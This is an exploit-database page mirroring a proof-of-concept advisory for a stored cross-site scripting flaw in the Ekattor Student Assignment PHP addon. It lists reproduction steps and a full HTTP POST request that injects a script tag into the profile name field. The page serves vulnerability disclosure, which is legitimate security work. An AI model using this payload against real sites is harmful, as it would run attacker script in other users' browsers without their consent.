Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.today


Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021060055

Below is a copy:

Ekattor Student Assignment php script-Stored XSS
# Exploit Title: Ekattor Student Assignment php script-Stored XSS
# Date:2021-06-4
# Exploit Author: Mostafa Farzaneh - [email protected]
# Vendor Homepage: https://codecanyon.net/user/creativeitem
# Software Link: https://codecanyon.net/item/ekattor-student-assignment-addon/30416274
# Tested on: Ubuntu

#How To Produce it :
1-Go to /demo/v7/login
2-Login to your Account(teacher or student or parrent,...)
3-Navigate to My account=>Update profile
4-edite  "Name" feild to "<script>alert('xss')</script>"
5-Now, malicious code is executed wherever the user name is ready on the site

POST /demo/v7addon/teacher/profile/update_profile HTTP/1.1
Host: localhost
Content-Length: 651
Accept: application/json, text/javascript, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarysm60AiiVmAB6CmzY
Origin: localhost
Referer: http://localhost/demo/v7addon/teacher/profile
Accept-Encoding: gzip, deflate
Accept-Language: fa-IR,fa;q=0.9,en-US;q=0.8,en-XA;q=0.7,en;q=0.6
Cookie: ci_session=290c7b11d9e9f03c8e7a18b0d471b36741ec98b5
Connection: close

------WebKitFormBoundarysm60AiiVmAB6CmzY
Content-Disposition: form-data; name="name"

Alison <script>alert('xss')</script>
------WebKitFormBoundarysm60AiiVmAB6CmzY
Content-Disposition: form-data; name="email"

[email protected]
------WebKitFormBoundarysm60AiiVmAB6CmzY
Content-Disposition: form-data; name="phone"

345020212
------WebKitFormBoundarysm60AiiVmAB6CmzY
Content-Disposition: form-data; name="address"

82 Kuen Suk Shuen Tsuen Hang Hiu Kowloon
------WebKitFormBoundarysm60AiiVmAB6CmzY
Content-Disposition: form-data; name="profile_image"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundarysm60AiiVmAB6CmzY--



********************************************************* 
#Discovered by: Mostafa Farzaneh 
#Telegram: @pyweb_security
*********************************************************

Copyright ©2021 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.